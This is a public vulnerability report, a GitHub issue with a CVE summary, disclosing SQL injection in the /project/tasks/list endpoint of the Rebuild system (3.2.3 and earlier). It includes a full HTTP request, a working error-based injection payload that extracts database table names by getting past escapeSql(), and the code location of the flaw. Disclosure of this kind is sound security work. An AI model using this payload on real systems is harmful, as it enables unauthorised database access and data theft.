Headline
CVE-2023-1610: SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system · Issue #597 · getrebuild/rebuild
A vulnerability, which was classified as critical, has been found in Rebuild up to 3.2.3. Affected by this issue is some unknown functionality of the file /project/tasks/list. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223742 is the identifier assigned to this vulnerability.
版本 / Version
<=3.2.3
什么问题 / What’s the problem
SQL injection vulnerability exists in the/project/tasks/list interface of the rebuild system.
在rebuild系统的/project/tasks/list接口中存在SQL注入漏洞。
如何复现此问题 / How to reproduce this problem****功能点 / Function points
请求信息 / Request message:
POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 0
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0
Connection: close
攻击载荷 / payload:%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)–+
漏洞复现 / Vulnerability recurrence
There you can see it!
系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)
Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome
说明 / Suggested description
sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.
漏洞类型 / Vulnerability Type
SQLi
产品供应商 / Vendor of Product
https://github.com/getrebuild/rebuild
受影响的产品代码库 / Affected Product Code Base
<=3.2.3
受影响组件 / Affected Component
/project/tasks/list
攻击方式 / Attack Type
Remote
漏洞成因 / Cause of vulnerability
In the com.build.web.project.ProjectTaskController#taskList() method, some SQL statements were customized and eventually spliced into the query statement.
在com.rebuild.web.project.ProjectTaskController#taskList()方法中,自定义了部分SQL语句,并且最终将该部分SQL语句拼接至查询语句中。
Although the 'StringsEscapeUtils. EscapeSql()' method is used here to process user input, there is a bypass.
虽然此处使用了StringsEscapeUtils.escapeSql()方法对用户输入做了处理,但存在绕过。
Finally, in line 122 of com.rebuild.web.project.ProjectTaskController, user input was brought into the query statement, causing a SQL injection vulnerability.
最终在com.rebuild.web.project.ProjectTaskController的第122行,将用户输入带入到查询语句中,造成SQL注入漏洞。
The end,thanks!